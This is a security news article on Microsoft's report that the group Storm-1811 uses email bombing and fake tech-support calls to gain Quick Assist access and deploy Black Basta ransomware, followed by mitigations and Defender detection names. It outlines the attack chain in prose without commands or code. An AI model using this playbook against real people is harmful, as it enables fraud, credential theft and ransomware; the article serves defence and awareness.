Microsoft has been investigating a campaign where financially motivated cybercriminals abuse the Windows Quick Assist feature to deploy Black Basta ransomware on victims’ networks. The threat group, identified as Storm-1811, initiates their attacks by overwhelming targets with a flood of unsolicited emails, a tactic known as email bombing. This campaign has been under scrutiny since at least mid-April 2024.
Email Bombing and Voice Phishing Tactics
The attackers begin by subscribing the victim’s email address to various services, causing their inboxes to be inundated with spam. Subsequently, the threat actors impersonate Microsoft technical support or the victim’s company’s IT staff, contacting the targets by phone to offer assistance in resolving the spam issue. During these voice phishing calls, the attackers persuade the victims to grant them access to their Windows devices via the Quick Assist remote control and screen-sharing tool.
Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks that lead to Black Basta ransomware. https://t.co/PA5dW6alnQ
— Microsoft Threat Intelligence (@MsftSecIntel) May 15, 2024
Once access is granted, the attackers execute a scripted cURL command to download malicious batch or ZIP files. According to Microsoft, these files often lead to the installation of Qakbot, remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, and the Cobalt Strike penetration testing toolkit. After the phone call, Storm-1811 conducts domain enumeration and lateral movement within the victim’s network, ultimately deploying the Black Basta ransomware using the Windows PsExec tool.
Cybersecurity firm Rapid7 has also observed these attacks, noting that the attackers use batch scripts to harvest the victim’s credentials via PowerShell commands. These credentials are collected under the pretense of requiring a login for an update and are immediately exfiltrated to the attackers’ server using Secure Copy Protocol (SCP). In some cases, credentials are saved to an archive for manual retrieval.
Mitigation and Recommendations
To mitigate these social engineering attacks, Microsoft advises network defenders to block or uninstall Quick Assist and similar RMM tools if they are not in use. Employees should be trained to recognize tech support scams, and connections should only be allowed if initiated by the user contacting IT support or Microsoft Support. Any suspicious Quick Assist sessions should be terminated immediately.
Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:
- “Consider blocking or uninstalling Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as Remote Help, block or remove Quick Assist as a best practice. Remote Help is part of the Microsoft Intune Suite and provides authentication and security controls for helpdesk connections.
- Educate users about protecting themselves from tech support scams. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services.
- Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
- If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
- Users who have been affected by a tech support scam can also use the Microsoft technical support scam form to report it.“
The Black Basta ransomware group emerged as a Ransomware-as-a-Service (RaaS) operation in April 2022, following the disbandment of the Conti cybercrime group. Since then, Black Basta affiliates have targeted numerous high-profile organizations.
Quick Assist and Its Vulnerabilities
Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. This enables the connecting user to remotely connect to the receiving user’s device and view its display, make annotations, or take full control, typically for troubleshooting.
In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams.
Microsoft Defender’s Role
Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services.
Qakbot and RMM Tools
Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811. ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.
Further Mitigations
Microsoft recommends the following mitigations to reduce the impact of this threat:
- “Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
- Educate users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
- Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
- Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
- Turn on tamper protection features to prevent attackers from stopping security services.
- Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.”
Detection and Alerts
Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block execution of potentially obfuscated scripts
- Block process creations originating from PSExec and WMI commands
- Use advanced protection against ransomware
Malware Detection
Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:
- TrojanDownloader:O97M/Qakbot
- Trojan:Win32/QBot
- Trojan:Win32/Qakbot
- TrojanSpy:Win32/Qakbot
- Behavior:Win32/Qakbot
Black Basta threat components are detected as the following:
- Behavior:Win32/Basta
- Ransom:Win32/Basta
- Trojan:Win32/Basta
Microsoft Defender Antivirus detects Beacon running on a victim process as the following:
- Behavior:Win32/CobaltStrike
- Backdoor:Win64/CobaltStrike
- HackTool:Win64/CobaltStrike
Additional Cobalt Strike components are detected as the following:
- TrojanDropper:PowerShell/Cobacis
- Trojan:Win64/TurtleLoader.CS
- Exploit:Win32/ShellCode
Last Updated on November 7, 2024 8:24 pm CET